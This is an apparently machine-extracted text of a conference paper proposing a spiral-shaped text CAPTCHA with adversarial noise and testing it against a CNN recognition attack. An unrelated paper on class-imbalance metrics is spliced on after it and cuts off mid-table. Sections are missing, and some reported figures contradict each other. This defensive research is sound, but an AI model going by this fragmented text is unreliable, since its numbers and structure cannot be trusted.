Retrieved from https://www.youtube.com/watch?v=RplnSVTzvnU
Spiral CAPTCHA with Adversarial
Perturbation and Its Security Analysis
with Convolutional Neural Network
Abstract Human or bot? The first question comes in mind before deploying web
services. A Completely Automated Public Turing test to tell Computer and Human
Apart (CAPTCHA) is a tool which generally used to boost the security of web
services by conducting a challenge-response test. This test helps to determine whether
incoming requests from legitimate user or intelligent bots. A bot finds it difficult to
predict distorted words which human can easily recognize. There are two major
aspects of a CAPTCHA: easily identified CAPTCHAs by humans and the ability to
prevent bot attacks. This paper presents a new text-based CAPTCHA design called
Spiral CAPTCHA with an immutable adversarial noise (IAN) and validate it using
convolutional neural network (CNN) attacks. A new text-based CAPTCHA “Spiral
CAPTCHA” is designed using PHP. A dataset of 16,384 images has been created.
The proposed CAPTCHA has also been tested for its security against convolutional
neural network “Alexnet.” For evaluation purposes, the CNN model designed with a
dataset containing 8,027 images and validated using 3441 images. Testing of model
performed by randomly choosing bunches of 64, 128, 256, and 512 images from
testing a dataset of 4916 images. For robustness checking against recognition, we
initially tested CAPTCHA without any noise and later checked with noise. Finally,
proposed CAPTCHA is evaluated using recognition rate, recognition speed, attack
speed, and success rate. We achieved a maximum recognition rate for CAPTCHA
without perturbation is 38.48% and with perturbation is 13.50%. However, success
rate is very low (almost 0%) for both cases, which confirms that the proposed
CAPTCHA is robust against recognition attacks.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 67
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_6
68 Shivani and C. R. Krishna
1 Introduction
Von Ahn et al. were the first in the world, who brought the concept of CAPTCHA.
A challenge—response human intelligence test which is considered to be passed
by humans easily as compared to intelligent machines. It acts as a hurdle for bots
or automatic programs that halts them from exploiting essential web services [1].
Humans can solve CAPTCHA with 90% accuracy, whereas bots can solve them up
to a 1% success rate only, which makes them a good security measure to protect from
malicious programs [2].
Major web services secured by CAPTCHA are: online registration forms,
comments given on various blogs and websites, online polls, and email accounts.
A machine is incapable of identifying human or bot. A typical CAPTCHA process
involves a session in which automated questions are generated by the system and
presented in front of a user. The original identities of responders (humans/bots) are
hidden from system. It recognizes user by analyzing the responses. Another way
by providing a question set in such a way that it can easily solve by humans but
challenging job for bots. Major question categories involve: object identification
in a picture, labeling an image, recognize words in a speech, puzzle-solving, eye
CAPTCHA, pedometric CAPTCHA, and text recognition. Among various types of
CATCHAs, text-based CAPTCHA is the most commonly used one. It requires low
cost for generation of as many numbers as possible without exhausting. Text-based
CAPTCHAs do not require any storage because they use a simple combination of
alphanumeric symbols [3].
To improve the security and reduce the breaking rate, text-based CAPTCHAs
are secured with applying distortions, noise, hollow characters, character isolation,
varied length characters, character overlapping, noise arcs, complicated background,
two-layer structure etc. [4]. However, after the deployment of deep learning models
like convolutional neural network (CNN), it can be broken easily. Further K-nearest
neighbors (KNN) and support vector machine (SVM) models can identify the compli-
cated texts effectively [5–7]. Deep learning (DL) has reduced the identification gap
between human and bot by traditional problem solving. Due to advancements in
artificial intelligence (AI), several researchers claim that DL would lead CAPTCHA
to an “end” [8]. Text-based CAPTCHAs use a simple writing mechanism from left
to right. It enables DL networks to recognize the starting point easily. Therefore,
pre-processing attacks and segmentation can be done easily.
Deep learning brilliantly performs speech processing and image recognition with
human competency. However, it still lags with important deficiency like adversarial
attacks as compared with human capability. Adversarial examples are misclassified
by machine learning (ML) and DL models [9]. This can be taken as an advantage to
enhance CAPTCHAs security, which may leads to misclassification of CAPTCHA
[10].
Based on the above-mentioned issues, researchers developed a two-layer
CAPTCHA, crowding characters together, hollow schemes, etc., to overcome the
security issues [7, 11]. To present a secured CAPTCHA, it should provide robustness
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 69
2 Related Work
Lee et al., [15] proposed an attack resistance model to ensure the user-participation
using visual secret sharing for secured human interaction. Besides user fails to prove
themselves as humans, the system aborts the process to provide security with the help
of CAPTCHA. The simulation outcomes validate the performance of authentication
accuracy among users in terms of practicability.
Castro et al., [16] have presented a human interactive proof (HIP) using puzzle
completion model via the Capy CAPTCHA strategy to enhance the usability and
stability using JPEG compression model. In order to overcome the shortages in
conventional CAPTCHAs, a reduced-cost joint photographic experts group (JPEG)
was utilized to evaluate the images continuity. The investigational work attains a
65% success rate and 20% breaking rate.
70 Shivani and C. R. Krishna
Gao et al., [17] have proposed an attack to validate the security of the two-
layer CAPTCHAs developed by Microsoft. The empirical studies represent the effi-
ciency of the proposed attack using CNN and KNN model with 44.6% success rate.
Furthermore, it provided suggestions to develop improved CAPTCHAs with better
security.
Zhu et al., [18] have introduced a security model named CAPTCHA as graphical
passwords using hard AI techniques to enhance online security. Typically, it was a
combination of CAPTCHA as well as graphical password model which also considers
several security attacks and image hotspot issues. From the simulation analysis, it
proved the usability as well as security.
Beheshti et al., [19] have developed a Visual Integration CAPTCHA (VICAP)
model with supreme capabilities of the Human Visual System (HVS) to combine
the complicated data available in single frames through trans-saccadic memory tech-
nique. Moreover, it combined visual resolution to provide image continuity. Further,
it guaranteed the usability by tuning the Original-to-Random-Output as 40% and
attains success rate of 99% and breaking rate of 0% in the single-frame environment
and 50% in the multi-frame environment.
Ogiela et al., [20] have presented a visual CAPTCHA producing technique with
various formats of texts integrated in a persistent background. In addition, it assesses
the flaws and strength of the proposed CAPTCHA in order to ensure security
through various image detection methodologies, particularly, pattern recognition
models. These CAPTCHA models were applicable specifically for Cloud of Things
applications. Furthermore, cognitive CAPTCHAs were also introduced to enhance
security.
Khattar et al. [21] proposed a plug-n-play adversarial attack (PPAA) in which
perturbation was generated by using constrained uniform random noises. They tested
their approach on Microsoft Common Objects in context dataset and used RetinaNet
object detection algorithm. Authors achieved 96.48% success rate.
Ping Wang et al. [22] proposed a transfer-learning approach for attacking
CAPTCHA. This schemes reduces the attacking complexity and samples labeling
cost. Authors attacked 25 CAPTCHAs online and attained a success rate from 36.3
to 96.9%.
Philip et al. [23] presented a novel data collection technique by using game like
CAPTCHAs. Collected data is used for fake account use revealing by creating a
behavior biometric. They presented game like CAPTCHA as a solution to generate
biometrics interactive data.
Zahra et al. [24] developed a CNN-based deep CAPTCHA to investigate design
shortcomings of alphanumeric CAPTCHAs. They achieved a network attacking
accuracy rate 98.31% for alphanumerical data and 98.94% for numerical data.
Jafar et al. [25] developed prediction of brain tumor with its location using mathe-
matical analysis and machine learning techniques. Author claimed that this approach
will give good accuracy and results.
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 71
In this paper, a new technique named as “Spiral CAPTCHA” has been proposed
for writing text-based CAPTCHAs. Spiral CAPTCHA resembles to a spiral shape
which initiates from center and radially grows outwards clockwise or anticlockwise.
Figure 1a shows the spiral shape, Fig. 1 shows proposed Spiral CAPTCHA with arcs
as noise, and Fig. 1c shows its resemblance with spiral shape. It can be seen in below
figure how letters in Spiral CAPTCHA are originating from center like spiral and
moving out radially in clockwise direction.
Spiral CAPTCHA is perturbed with immutable adversarial noise (IAN) [10] and
tested for its security from CNN with and without noise. IAN uses “Fast Gradient
Sign Method” followed by a 5 × 5 Median and applied iteratively on the value of
epsilon (noise factor) until it predicts the wrong target. Fast gradient sign method
(FGSM) finds the signed gradient of the image from itself which used to induce
perturbation in an input image. The main advantage of this perturbation is a user
does not find much difference between actual and perturbed image.
The noise factor step-wise increased and the whole image passed through median
filter. Resulting image passed to CNN for prediction and the process is repeated
with increased value of epsilon until it gets predicted wrong. It is considered that the
proposed CAPTCHA will provide two way securities, first from segmentation attacks
as it uses an unconventional writing scheme, i.e., spiral instead of left to right, which
enables CNN networks to easily recognize starting point of CAPTCHA. Second the
intelligent perturbation used in the CAPTCHA which enables CNN to misclassify
it.
This research inspired from two sources: first “Microsoft’s two-layer CAPTCHA”
(Fig. 2) [17] where a six-characters text CAPTCHA has been written in two rows,
three letters in first row, and rest three in second row using mix of hollow scheme and
character overlapping and second “Immutable adversarial noise” by Osadchy et al.
[10, 17].
Proposed work has been implemented with the following step-by-step procedure:
image because image pre-processing converts a colored image into grayscale [4], and
therefore, colors lost its meaning in first step itself of image processing by CNN. A
dummy web page is created using PHP to display captcha image and its use. XAMPP
server is used to host the web page locally. Figure 3 shows the web layout of proposed
CAPTCHA. As shown in figure, users are instructed by writing an instruction below
CAPTCHA image “Enter from center in clockwise direction.” Now here one task
is left on user to find out the center of image, e.g., in above-mentioned web page,
the CAPTCHA image used has text “5VLF8P” if we read from center in clockwise
direction.
A dataset of 16,384 images in PNG format has been created. Out of which 8027
images were used for training, 3441 for validation and remaining 4916 for testing
purpose. Every image is saved in sorted form with its characters as the label of image
as shown in Fig. 4.
Instead of using a pre-trained network, a new CNN Alexnet (Fig. 5) has been taken
with three convolution layers, three max_pool layers and two fully connected layers.
74 Shivani and C. R. Krishna
A single channel input image of size 120 × 150 pixels was passed to network. Model
was run for 10 and 50 epochs.
Our dataset was passed through CNN for training, validation, and testing purpose. We
used a laptop with 2.59 GHz Intel core i7 processor and 4 GB RAM with Windows
10, 64-bit operating system. Python version 3.7 used with Keras and Tensorflow 2.1.0
as backend. CNN was trained with 8027 image dataset, validated for 3441 images,
and tested for the randomly chosen batches of 64, 128, 256, and 512 from testing
dataset of 4916 images. Prediction of few images without adding perturbation is
given in Fig. 6.
Testing images then perturbed with IAN mentioned in previous section and tested
with CNN for recognition. The perturbed image and original image almost look same,
and user can easily recognize image without any difficulty, but in case of CNN, the
perturbation leads to misclassification. The image without and with perturbation can
be seen in Fig. 7 with the noise factor up to 2.95. Out of which 1.35 (Fig. 7h) is
76 Shivani and C. R. Krishna
(a) Plain Image (b) Perturbation (c) Perturbed Image, epsilon = 0.35 (d) Perturbed Image, epsilon = 0.55
(e) Perturbed Image, epsilon = 0.75 (f) Perturbed Image, epsilon = 0.95 (g) Perturbed Image, epsilon = 1.15 (h) Perturbed Image, epsilon = 1.35
(i) Perturbed Image, epsilon = 1.55 (j) Perturbed Image, epsilon = 1.75 (k) Perturbed Image, epsilon = 1.95 (l) Perturbed Image, epsilon = 2.15
(m) Perturbed Image, epsilon = 2.35 (n) Perturbed Image, epsilon = 2.55 (o) Perturbed Image, epsilon = 2.75 (p) Perturbed Image, epsilon = 2.95
chosen as threshold value for proposed work because noise above that seems to be
more visible to the user and loses its purpose of not to be recognized by user. Figure 8
shows the prediction of CNN on perturbed images with epsilon value 1.35.
4 Performance Parameters
Nr
RR = × 100 (1)
Nn
b. Recognition Speed (RS): It is defined as the average time (in seconds) to
recognize individual character and is given by Eq. 2.
Ta
RS = × 100 (2)
Nn
c. Success Rate (SR): It is defined percentage of average extent of recognition of
full CAPTCHA by CNN and is given by Eq. 3.
Nr c
SR = × 100 (3)
N
d. Attack Speed (AS): It is defined as the total time taken to recognize full
CAPTCHA.
Where
Nr: Number of characters recognized correctly per CAPTCHA.
Nn: Total number of characters per CAPTCHA.
Ta: Time taken to recognize all characters in CAPTCHA.
Nrc: Number of CAPTCHAs recognized correctly by CNN.
N: Total number of CAPTCHAs used as dataset.
Results of proposed CAPTCHA have been taken with and without noise over the
parameters mentioned in previous section.
Testing was performed on randomly permuted images from 4916 samples in the
form of batches of 64, 128, 256, and 512. Testing performed with different epochs
initially 10 then 50. Following results were found:
78 Shivani and C. R. Krishna
Table 1 shows the results of four parameters taken for analysis for the images without
perturbation. The results show that for 10 epochs and 50 epochs, all four parameters
have small variation for all batches, i.e., 64–512. In case of images without perturba-
tion, recognition rate (RR) has maximum value 38.48% on 10 epochs and 256 data
batch and minimum value 33.33% on 50 epochs for 64 data batch. Success rate (SR)
has maximum value 0.19% for batch size 512 for both epochs 10 and 50. Recognition
speed (RS) and attack speed (AS) are fastest with 798, 4787 micro seconds on batch
size 64 for 50 epochs and slowest with 1807, 10,842, respectively, micro seconds on
batch size 128 for 10 epochs.
Table 2a shows the RR and SR results for perturbed images. Here the minimum RR
is 11.48% on 64 batch size, 2.35 epsilon and for 50 epochs and maximum is 29.82%
on 128 batch size, 0.15 epsilon and 50 epochs. But, we considered the maximum
RR is 13.50% on 512 batch size for 1.35 epsilon and for 10 epochs. The reason to
choose this is because we have considered 1.35 as threshold value of epsilon beyond
this value the noise is more visible, and user can easily recognize it. But our aim is
that noise should not be recognized by the user. SR is 0% in all cases. This means
perturbed images are not recognized by CNN. In Table2b, RS and AS are fastest
with 802 and 4812 micro seconds, respectively, on batch size 64 for epsilon equals
to 2.35, but we selected 899 and 5395 microseconds on batch size 128 for epsilon
equals to 0.95 due to threshold value of epsilon.
To check the usability of the proposed CAPTCHA, a survey was performed with 130
engineering students of 3rd and 4th year along with 50 general office staff with no
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 79
Table 2 a Recognition rate and success rate for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (%) 64 128 256 512 64 128 256 512
RR Epsilon
0.15 28.65 29.82 29.36 27.60 25.78 29.30 29.69 28.81
0.35 23.96 25.52 25.59 23.57 21.88 24.74 25.85 25.26
0.55 19.27 20.96 21.42 19.99 19.01 21.61 23.05 21.10
0.75 18.23 18.75 19.47 17.90 17.71 18.88 20.77 19.86
0.95 16.93 17.06 18.03 16.47 17.45 17.06 19.21 18.36
1.15 15.63 15.49 16.02 14.84 15.63 15.50 16.99 16.70
1.35 14.32 14.19 14.45 13.50 13.80 14.20 15.49 15.40
1.55 13.97 13.45 14.09 13.05 12.77 13.64 14.75 15.03
1.75 13.23 13.65 13.95 13.40 12.25 14.14 14.40 14.57
1.95 12.85 12.64 13.90 12.52 12.91 13.57 14.88 14.33
2.15 11.90 12.41 12.20 12.47 12.87 12.27 14.85 13.12
2.35 11.67 11.74 12.96 11.76 11.48 12.29 15.48 13.43
SR 0.15 0 0 0 0 0 0 0 0
0.35 0 0 0 0 0 0 0 0
0.55 0 0 0 0 0 0 0 0
0.75 0 0 0 0 0 0 0 0
0.95 0 0 0 0 0 0 0 0
1.15 0 0 0 0 0 0 0 0
1.35 0 0 0 0 0 0 0 0
1.55 0 0 0 0 0 0 0 0
1.75 0 0 0 0 0 0 0 0
1.95 0 0 0 0 0 0 0 0
2.15 0 0 0 0 0 0 0 0
2.35 0 0 0 0 0 0 0 0
b Recognition speed and attack speed for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (µs) 64 128 256 512 64 128 256 512
RS 0.15 958 912 931 1026 1144 947 950 929
0.35 1004 947 922 981 1087 916 911 941
0.55 966 913 926 999 1282 948 909 964
0.75 990 920 942 978 1082 929 911 961
0.95 1000 925 899 937 1280 937 916 949
1.15 1013 936 928 952 1198 903 914 956
1.35 980 950 929 918 1154 916 955 957
(continued)
80 Shivani and C. R. Krishna
Table 2 (continued)
b Recognition speed and attack speed for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (µs) 64 128 256 512 64 128 256 512
1.55 1102 1007 897 1186 801 1098 1151 1154
1.75 988 941 929 1055 951 836 1037 878
1.95 1086 1176 960 897 961 1055 1006 996
2.15 1200 917 903 834 923 909 1132 970
2.35 1073 1077 928 1143 802 1009 803 949
AS 0.15 5748 5475 5584 6157 6866 5681 5103 5574
0.35 6022 5684 5533 5887 6527 5498 5464 5648
0.55 5797 5476 5557 5993 7690 5687 5456 5785
0.75 5942 5523 5651 5866 6494 5572 5468 5767
0.95 5998 5553 5395 5621 7682 5621 5495 5695
1.15 6077 5617 5567 5713 7188 5416 5486 5737
1.35 5882 5697 5576 5509 6927 5497 5732 5704
1.55 6612 6042 5382 7116 4806 6588 6906 6924
1.75 5928 5646 5574 6330 5706 5016 6222 5268
1.95 6516 7056 5760 5382 5766 6330 6036 5976
2.15 7200 5502 5418 5004 5538 5454 6792 5820
2.35 6438 6462 5568 6858 4812 6054 4818 5694
Note: SR 0% for all value of Epsilon and batch size show that CNN did not predict any Spiral
CAPTCHA image right. Therefore, 0% SR
However, security of the Spiral CAPTCHA can be seen by analyzing the results of
Tables 1 and 2a, b. Both shows that success rate for guessing the CAPTCHA is 0% in
almost all cases. This shows that proposed CAPTCHA is robust against recognition
attacks.
Spiral CAPTCHA shows a maximum success rate of 0.19% for the images without
perturbation and 0% for images with perturbation. This shows that spiral shape and
adding IAN to the CAPTCAH makes it strong enough to stand against recognition
attacks. Also, it can be seen that Spiral CAPTCHA is more secure when compared
with the other CAPTCHA schemes as shown by Mengyun et al. [4]. Authors have
attacked different CAPTCHA schemes of top 50 websites and attained a good success
rate for these schemes. Attack results for success rate of various schemes are shown
in Table 4.
Lowest success rate is against reCAPTCHA which is 10.0%. But in Spiral
CAPTCHA success rate is 0.19% maximum for the images without perturbation.
Hence, Spiral CAPTCHA is considered to be more secure than the presently available
CAPTCHA schemes. Therefore, designing CAPTCHA with spiral shape and adding
intelligent perturbation to the Spiral CAPTCHA makes it robust against recognition
attacks.
7 Concluding Remarks
rate is very low (almost 0%) for both cases, i.e., 0.19% for images without perturba-
tion and 0% for images with perturbation. This prediction for proposed CAPTCHA is
wrong most of the time. Maximum recognition rate is also very small with 39.48% for
images without perturbation and 29.82% with perturbation. This means that only one
or two characters are recognized exactly in few CAPTCHAs on an average. Hence,
it is demonstrated that the proposed Spiral CAPTCHA is robust against recognition
attacks and is usable practically.
References
1. Ahn Von, L., Blum, M., Hopper, N. J., & Langford, J. (2003). CAPTCHA: Using hard AI
problems for security. In Advances in Cryptology—EUROCRYPT 2003 (pp 294–311)
2. Bursztein, E., Martin, M., & Mitchell, J. (2011). Text-based CAPTCHA strengths and weak-
nesses. In Proceedings 18th ACM Conference Computer Communication Security—CCS 11,
(pp 125).
3. Lee, L. Y., & Hsu, H. C. (2011). Usability study of text-based CAPTCHAs. In Displays (pp
81–86).
4. Tang, M., Gao, H., Zhang, Y., Liu, Y., Zhang, P., & Wang, P. (2018). Research on deep
learning techniques in breaking text-based Captchas and designing image-based Captcha. IEEE
Transactions on Information Forensics and Security, 2522–2537.
5. Yan, J., Salah, A., & Ahmad, E. (2011). Captcha perspective. In Computer (pp 54–60).
6. Yan, J., & Ahmad El, S. A. (2009). CAPTCHA security: A case study. IEEE Security & Privacy,
22–28.
7. Chalil, K., Greenstein, S. J., & Horan, K. (2019). International journal of industrial ergonomics
empirical studies to investigate the usability of text- and image-based CAPTCHAs. Interna-
tional Journal of Industrial Ergonomics, 200–208.
8. Bursztein, E., Aigrain, J., Moscicki, A., & Mitchell, C. J. (2014). The end is nigh: Generic
solving of text-based CAPTCHAs. In Usenix Woot (pp. 3).
9. Szegedy, C., Bruna, J., Erhan, D., & Goodfellow, I. (2014). Intriguing properties of neural
networks. In arXiv:1312.6199[cs.CV] (pp. 1–10).
10. Osadchy, M., Hernandez-Castro, J., Gibson, S., Dunkelman, O., & Perez-Cabo, D. (2017).
No bot expects the deep CAPTCHA! Introducing immutable adversarial examples, with
applications to CAPTCHA generation. Transactions on Information Forensics and Security,
2640–2653.
11. Lin, D., Lin, F., Lv, Y., Cai, F., & Cao, D. (2018). Chinese character CAPTCHA recognition
and performance estimation via deep neural network. Neurocomputing, 11–19.
12. Roshanbin, N., & Miller, J. (2016). ADAMAS: Interweaving unicode and color to enhance
CAPTCHA security. Future Generation Computer Systems, 289–310.
13. Nguyen, D. V., Chow, W. Y., & Susilo, W. (2014) On the security of text-based 3D CAPTCHAs.
Computer & Security, 84–99.
14. Schryen, G., Wagner, G., & Schlegel, A. (2016). Development of two novel face-recognition
CAPTCHAs: A security and usability study. Computers & security, 95–116.
15. Lee, S. J., & Hsieh, H. M. (2013). Preserving user-participation for insecure network
communications with CAPTCHA and visual secret sharing technique. IET Networks, 81–91.
16. Hernandez-Castro, J. C., Moreno, R. D. M., & Barrero, F. D. (2015). Using JPEG to measure
image continuity and break capy and other puzzle CAPTCHAs. IEEE Internet Computing,
46–53.
17. Gao, H., Tang, M., Liu, Y., Zhang, P., & Liu, X. (2017). Research on the security of microsoft’s
two-layer Captcha. Transactions on Information Forensics and Security, 1671–1685.
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 83
18. Zhu, B. B., Yan, J., Bao, G., Yang, M., & Xu, N. (2014). Captcha as graphical passwords—A
new security primitive based on hard AI problems. Transactions on Information Forensics and
Security, 891–904.
19. Beheshti, S. R. M. S., Liatsis, P., & Rajarajan, M. (2017). A CAPTCHA model based on visual
psychophysics: Using the brain to distinguish between human users and automated computer
bots. In Computers & security, 596–617.
20. Ogiela, R. M., Krzyworzeka, N., & Ogiela, L. (2018). Application of knowledge-based cogni-
tive CAPTCHA in cloud of things security. In Concurrency and Computation: Practice and
Experience, 30, e4769. https://doi.org/10.1002/cpe.4769
21. Khattar, S., & Rama Krishna, C. (2020). Adversarial attack to fool object detector. Journal of
Discrete Mathematical Sciences and Cryptography, 547–562.
22. Wang, P., Gao, H., Shi, Z., Yuan, Z., & Hu, J. (2020). Simple and easy: Transfer learning-based
attacks to text CAPTCHA. IEEE Access, 1–1.
23. Kirkbride, P., Dewan, A. A. M., & Lin, F. (2020). Game-like Captchas for intrusion detection
game-like Captchas for intrusion detection. In International Conference on Cyber Science and
Technology Congress (pp. 312–315).
24. Noury, Z., & Rezaei, M. (2020). Deep-CAPTCHA: A deep learning based CAPTCHA solver
for vulnerability assessment. arXiv:2006.08296
25. Jafar, A. A., Ambeshwar, K., Omar, A. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 267–272.
26. Aditya, K., Deepak, G., Nhu, G. N., Ashish, K., Babita, P., & Prayag, T. (2019). Sound clas-
sification using convolutional neural network and tensor deep stacking network. IEEE Access,
7717–7727.
Predicting Classifiers Efficacy in Relation
with Data Complexity Metric Using
Under-Sampling Techniques
Abstract In imbalanced classification tasks, the training datasets may suffer from
other problems like class overlapping, small disjuncts, classes of low density, etc.
In such a situation, the learning for the minority class is imprecise. Data complexity
metrics help us to identify the relationship between classifier’s learning accuracy and
dataset characteristics. This paper presents an experimental study for imbalanced
datasets wherein dwCM complexity metric is used to group the datasets based on the
complexity level, thereafter the behavior of under-sampling based pre-processing
techniques are analyzed for these different groups of datasets. Experiments are
conducted on 22 real life datasets with different levels of imbalance, class over-
lapping and density of the classes. The experimental results show that these groups
formed using dwCM metric can better explain the difficulty of imbalanced datasets
and help in predicting the response of the classifiers to the under-sampling algorithms.
1 Introduction
A vital issue that has been acknowledged widely in machine learning community is of
skewed datasets, that is, the number of samples of one class (called as majority class)
outperforms the number of samples in the other class(es) (called as minority class).
Such skewed datasets are referred as imbalanced datasets and the problem thus called
as class imbalance problem. The class imbalance problem causes difficulty for many
classifying algorithms since the classifiers are often biased toward the majority class
[1]. Many methods have been proposed to deal with this problem [2–9]. However,
studies suggest that the class imbalance is not only responsible for the significant
degradation of the performance on individual classes but also there are certain other
internal factors of the dataset that when occurs together with the class imbalance can
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 85
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_7
86 D. Singh et al.
lead to serious drop of the classifier accuracy, especially for the minority class. These
internal difficulty factors are: small disjuncts, small dataset size, overlaps between
the minority and majority classes and class separability. Recently, researchers have
started using the data complexity metrics to describe the difficulty factors for datasets
for classification problems [10–18]. These data complexity metrics try to quantify
different aspects or sources of data particularities which are considered difficult to
the classification task [10].
However, the existing complexity metrics do not work well in case of imbalanced
datasets. In [19], the authors proposed the complexity metrics: wCM and dwCM,
for imbalanced datasets. With the series of experiments, we have shown that these
proposed metrics help to identify the difficulty level of the imbalanced dataset and
thus proved useful to decide whether class balancing algorithms are required to
improve performance of the base classifiers.
In this paper, we have used the dwCM complexity metrics to inspect the association
between the poor efficacy of the classifiers and the intrinsic features of the dataset. Our
contributions in this paper are: (a) estimating difficulty level for imbalanced datasets
using dwCM (b) to explore the competence of different under-sampling algorithms to
deal with the internal data factors. In order to study the impact of dataset complexity
on the performance of classifiers using under-sampling pre-processing methods, we
grouped the datasets on the basis of the dwCM complexity metric. We choose five
dwCM ranges for our comparisons, defined as: dwCM ≤ 20%, 21% ≤ dwCM ≤
30%, 31% ≤ dwCM ≤ 40%, 41% ≤ dwCM ≤ 50% and dwCM > 50%, respectively.
The rest of the paper is organized as follows. Section 2 presents the related works
for data complexity metrics. Section 3 explains the proposed work for this paper.
Section 4 discusses the experimental study and the results obtained for the under-
sampling techniques applied on different groups of datasets. Section 5 provides the
conclusion of this paper.
2 Related Works
The data complexity metrics quantify particular aspects of a dataset, which helps
in selecting the appropriate classification algorithm. Basu and Ho [10] studied the
relationship between the overall classification performance and the intrinsic char-
acteristics of data and they proposed the taxonomy of the data complexity metrics,
which served as keystone for categorizing the data mining problems. Several other
studies [20, 21] have investigated the use of these metrics to analyze the classification
problems.
On the other hand, most studies [16–18, 22–25] have shown that the existing
data complexity metrics perform poorly in imbalanced scenarios. Moreover, recently
some of the metrics have been proposed [16, 19, 22, 24, 25] for accessing
the complexity of imbalanced datasets. A scatter matrix based class separability
complexity metric for imbalanced datasets was proposed by Xing et al. [24]. Another,
metric for imbalanced dataset based on k-nn approach was given by Anwar et al.
Predicting Classifiers Efficacy in Relation with Data Complexity … 87
[16]. Further, Fernandez et al., [17] suggested a method based on feature selec-
tion and instance selection, to overcome class overlap and class imbalance. Diez-
Pastor et al. [26] used them to predict data complexity intervals for which some
diversity-enhancing techniques may improve the results of an ensemble method.
Barella et al., [22] presented three complexity metrics, adapted from the famous
complexity metrics, for imbalanced datasets by regarding each class individually.
3 Proposed Work
In this paper, we study the relationship of dwCM complexity metric and the classifiers
with and without using under-sampling based pre-processing methods. In order to
study the impact of dataset complexity on the performance of classifiers, we grouped
the datasets on the basis of dwCM complexity metric value (we have considered
the datasets and dwCM metric values calculated in the research paper [19]). Based
on the previous computed values of the dwCM metric, the different dwCM ranges
considered in this paper are defined as: dwCM ≤ 20% (not complex), 21 ≤ dwCM ≤
30% (very less complex), 31 ≤ dwCM ≤ 40% (less complex), 41 ≤ dwCM ≤ 50%
(complex) and dwCM > 50% (highly complex).
In this study, we have considered four different base classifiers to evaluate dataset
complexity: k-nearest neighbor (k-nn) with k = 3, classification tree (CT), support
vector machines (SVMs) using linear kernel and logistics regression (LR). All four
classifiers are executed using Matlab classification learner app tool. The under-
sampling algorithms used in this paper are: Tk-Links [27], CNN [28], OSS [29]
and NCL [30]. In order to study the effect of these under-sampling algorithms and
to measure the performance of classifier for different dataset groups, we have used
sensitivity measure because it provides information about proper classification of
minority class. Also, we have used specificity measure to calculate the correct accu-
racy for majority class and accuracy measure to measure the overall accuracy of the
classifiers.
4 Experimental Results
Table 1 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
on the original imbalanced datasets divided into different categories using dwCM complexity metric
Classifer Datasets groups based on dwCM Sensitivity Specificity Accuracy
(%)
k-nn <20 0.9643 (0.035) 0.995 (0.01) 0.9845 (0.02)
20–30 0.73 (0.059) 0.92 (0.09) 0.9045 (0.11)
31–40 0.577 (0.11) 0.9525 (0.069) 0.86475 (0.073)
41–50 0.5563 (0.048) 0.9451 (0.074) 0.901 (0.12)
>50 0.2666 (0.12) 0.9226 (0.06) 0.8342 (0.11)
CT <20 0.9262 (0.11) 0.9796 (0.025) 0.96525 (0.05)
20–30 0.6268 (0.003) 0.934 (0.08) 0.8885 (0.134)
31–40 0.6748 (0.16) 0.9048 (0.09) 0.872 (0.11)
41–50 0.5869 (0.07) 0.9468 (0.07) 0.9093 (0.12)
>50 0.2943 (0.24) 0.9079 (0.08) 0.8291 (0.103)
SVM <20 0.9058 (0.12) 0.978 (0.044) 0.9585 (0.06)
20–30 0.6268 (0.003) 0.9028 (0.098) 0.8645 (0.14)
31–40 0.5725 (0.003) 0.9157 (0.098) 0.8465 (0.14)
41–50 0.0388 (0.067) 0.9947 (0.009) 0.913 (0.13)
>50 0.0809 (0.13) 0.9709 (0.04) 0.8419 (0.11)
LR <20 0.9276 (0.107) 0.9691 (0.04) 0.96 (0.05)
20–30 0.6125 (0.018) 0.9201 (0.09) 0.8705 (0.14)
31–40 0.5925 (0.11) 0.9168 (0.08) 0.8525 (0.001)
41–50 0.3703 (0.05) 0.965 (0.063) 0.9037 (0.12)
>50 0.2125 (0.19) 0.9563 (0.04) 0.8431 (0.09)
Table 1 (2nd column), shows different complexity groups we used in this study and
for every group, the average values for the sensitivity, specificity and accuracy are
shown along with the standard deviation values. Table 1 column 3, for the datasets
in the groups like 31 ≤ dwCM ≤ 40%, 41 ≤ dwCM ≤ 50% and dwCM > 50%,
the sensitivity values show the decrease with the increasing complexity. For these
groups, the sensitivity is less than 0.30 for the k-nn, CT and LR classifiers and
is the worst for SVM classifier (i.e., 0.08), whereas for the groups like: dwCM <
20% and 21 ≤ dwCM ≤ 30%, the sensitivity values seem to be good (more than
0.90 for dwCM < 20% group, for all the classifiers and for 21 ≤ dwCM ≤ 30%
group, more than 0.60 for all the classifiers) without applying any pre-processing
algorithms. As it can be observed from these results that the behavior of classifiers
on less complex data sets is better and more uniform than on categories of problems
of higher complexity: in group dwCM < 20%, almost all classifiers seem to be robust
to the imbalance problem. SVM and LR performances rapidly degrade (increasing
Predicting Classifiers Efficacy in Relation with Data Complexity … 89
5 Conclusion
Table 2 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
after applying under-sampling algorithms on the original datasets divided into different categories
using dwCM complexity metric
Classifer Datasets groups Under-sampling Sensitivity Specificity Accuracy
based on dwCM algorithm
(%)
k-nn <20 OSS 0.9775 (0.045) 0.994 (0) 0.9818
(0.028)
20–30 OSS 0.905 (0.19) 0.86 (0.14) 0.87 (0.24)
31–40 NCL 0.7855 (0.08) 0.8625 0.8255
(0.09) (0.09)
41–50 NCL 0.8723 (0.13) 0.7417 0.8637
(0.14) (0.15)
